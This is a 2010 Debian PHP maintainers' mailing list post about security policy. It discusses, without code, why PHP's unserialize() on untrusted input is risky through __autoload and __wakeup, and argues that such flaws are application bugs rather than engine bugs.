[php-maint] PHP security policy review

sean finney seanius at debian.org
Wed Jun 30 20:33:03 UTC 2010


On Wed, Jun 30, 2010 at 02:37:40PM -0500, Raphael Geissert wrote:
> The problems I see with unserialize are:
> * Some, sloppy, apps unserialize and trust the result (often done with the 
> values of $_COOKIE too, whether serialized or not.)
> * If used in conjunction with classes, depending on the available classes 
> (either already loaded, or available via __autoload,) it can lead to 
> unexpected results or even code execution.

the latter point would be my primary concern.  if there is any class
in the application or any of its frameworks that uses __autoload or __wakeup
functionality in php classes, unserialize() becomes an instant attack vector.
there's probably more ways other things could be leveraged too.

since we're talking about what we will or won't support in the php *engine*
here, i don't think it's a problem to list these as other vectors that
we will not go out of our way to fix.  i.e. if there is such a vulnerability
in stable, it is not the fault of the engine for functioning as it should, it
is the fault of the application.


	sean

-- 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 190 bytes
Desc: Digital signature
URL: <http://lists.alioth.debian.org/pipermail/pkg-php-maint/attachments/20100630/aacc8020/attachment-0001.pgp>


More information about the pkg-php-maint mailing list